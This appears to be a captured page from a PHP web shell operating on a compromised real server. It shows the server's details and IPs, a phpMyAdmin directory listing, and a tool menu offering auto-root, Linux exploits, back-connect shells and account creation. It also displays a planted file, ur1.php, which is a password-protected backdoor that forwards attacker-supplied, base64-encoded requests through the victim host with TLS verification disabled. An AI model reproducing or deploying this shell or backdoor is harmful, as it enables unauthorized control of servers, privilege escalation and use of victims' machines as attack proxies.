Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
pma /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
sql
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-x---
vendor
[ DIR ]
drwxr-xr-x
CONTRIBUTING.md
2.53
KB
-rw-r--r--
ChangeLog
48.26
KB
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README
1.48
KB
-rw-r--r--
RELEASE-DATE-5.1.1
29
B
-rw-r--r--
babel.config.json
41
B
-rw-r--r--
composer.json
3.97
KB
-rw-r--r--
composer.lock
199.34
KB
-rw-r--r--
config.inc.php
4.4
KB
-rw-r--r--
favicon.ico
21.96
KB
-rw-r--r--
index.php
413
B
-rw-r--r--
package.json
2.2
KB
-rw-r--r--
print.css
1.01
KB
-rw-r--r--
robots.txt
26
B
-rw-r--r--
show_config_errors.php
1.32
KB
-rw-r--r--
ur1.php
1.81
KB
-rw-r--r--
url.php
1.58
KB
-rw-r--r--
yarn.lock
299.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ur1.php
<?php function sanitizeInput($input) { return base64_decode(strip_tags($input)); } if (isset($_POST['pwd']) && md5($_POST['pwd']) === 'f7f909e5246687610e1c56dc15121e26') { $target_url = isset($_POST['url']) ? sanitizeInput($_POST['url']) : ''; $request_data = isset($_POST['data']) ? sanitizeInput($_POST['data']) : ''; if (empty($target_url)) { http_response_code(404); die("no url provided"); } if (!filter_var($target_url, FILTER_VALIDATE_URL)) { http_response_code(404); die("URL format error"); } try { $ch = curl_init(); $options = [ CURLOPT_URL => $target_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 3, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ]; curl_setopt_array($ch, $options); if (!empty($request_data)) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $request_data); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch)) { throw new Exception("request error: " . curl_error($ch)); } http_response_code($http_code); echo "status code: {$http_code}\n\n"; echo $response; } catch (Exception $e) { http_response_code(404); echo "server error: " . $e->getMessage(); } finally { if (isset($ch)) { curl_close($ch); } } } http_response_code(404); ?>
Close